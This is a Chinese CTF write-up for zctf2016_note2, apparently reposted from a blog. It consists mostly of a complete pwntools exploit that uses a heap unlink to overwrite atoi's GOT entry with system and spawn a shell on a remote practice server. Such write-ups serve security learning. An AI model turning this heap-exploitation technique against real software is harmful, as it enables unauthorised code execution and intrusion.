zoukankan      html  css  js  c++  java

  • zctf2016_note2

    思路

    利用unlink分配到存储chunk的ptr数组处,改chunk的地址为got表地址即可泄露libc,然后通过edit函数将atoi_got改为system函数的地址,让程序再次执行atoi,并输入参数"/bin/shx00",即执行system("/bin/sh")拿shell。

    exp

    from pwn import *

#context.log_level = 'debug'

#io = process('./note2')
io = remote('node3.buuoj.cn',28019)
elf = ELF('./note2')
libc = ELF('./libc/libc-2.23.so')
atoi_got = elf.got['atoi']

def new(size,content):
	io.recvuntil('option--->>')
	io.sendline('1')
	io.recvuntil('Input the length of the note content:(less than 128)')
	io.sendline(str(size))
	io.recvuntil('Input the note content:')
	io.sendline(content)

def show(num):
	io.recvuntil('option--->>')
	io.sendline('2')
	io.recvuntil('Input the id of the note:')
	io.sendline(str(num))
	io.recvuntil('Content is ')
	content = io.recv()
	return content

def edit(num,content,num1):
	io.recvuntil('option--->>')
	io.sendline('3')
	io.recvuntil('Input the id of the note:')
	io.sendline(str(num))
	io.recvuntil('do you want to overwrite or append?[1.overwrite/2.append]'
)
	io.sendline(str(num1))
	io.recvuntil('TheNewContents:')
	io.sendline(content)

def delete(num):
        io.recvuntil('option--->>')
        io.sendline('4')
	io.recvuntil('Input the id of the note:')
	io.sendline(str(num))


heap_ptr_1=0x602120
fake_chunk = p64(0)+p64(0x81+0x20)
fake_chunk += p64(heap_ptr_1 - 0x18) + p64(heap_ptr_1 - 0x10)
fake_chunk += 'a'*0x10

io.recvuntil('Input your name:')
io.sendline('aaaa')
io.recvuntil('Input your address:')
io.sendline('1111')

new(0x80,fake_chunk)
new(0,'')
new(0x80,'b'*0x20)
new(0x10,'c'*0x8)

payload = 'd'*0x10 + 'd'*0x8 + p8(0x90)
edit(1,payload,1)

for i in range(7,-1,-1):
	payload = 'd'*0x10 + 'd'*i
	edit(1,payload,1)

payload = 'd'*0x10 + p64(0x20+0x80)
edit(1,payload,1)

delete(2)

edit(0,'a'*0x18 + p64(atoi_got),1)

atoi_addr = u64(show(0)[0:6].ljust(8,'x00'))
print 'atoi_addr:'+ hex(atoi_addr)
libc_base = atoi_addr - libc.sym['atoi']
system_addr = libc_base + libc.sym['system']
print 'system:'+hex(system_addr)

io.sendline('3')
io.sendlineafter('Input the id of the note:','0')
io.sendlineafter('do you want to overwrite or append?[1.overwrite/2.append]','1')
io.sendlineafter('TheNewContents:',p64(system_addr))

io.sendlineafter('option--->>','/bin/shx00')

io.interactive()

    参考

    zctf2016_note2
  • 相关阅读:
    bootstrap-table 数据表格行内修改
    java文件上传(单文件 多文件)与删除
    bootstrap-table之通用方法( 时间控件,导出,动态下拉框, 表单验证 ,选中与获取信息)
    bootstrap-table 大量字段整体表单上传之时间处理
    Java实习问题记录
    Playbook剧本初识
    自动化运维工具-Ansible基础
    性能优化概述
    Rewrite基本概述
    Nginx常见问题
  • 原文地址:https://www.cnblogs.com/luoleqi/p/13431944.html
Copyright © 2011-2022 走看看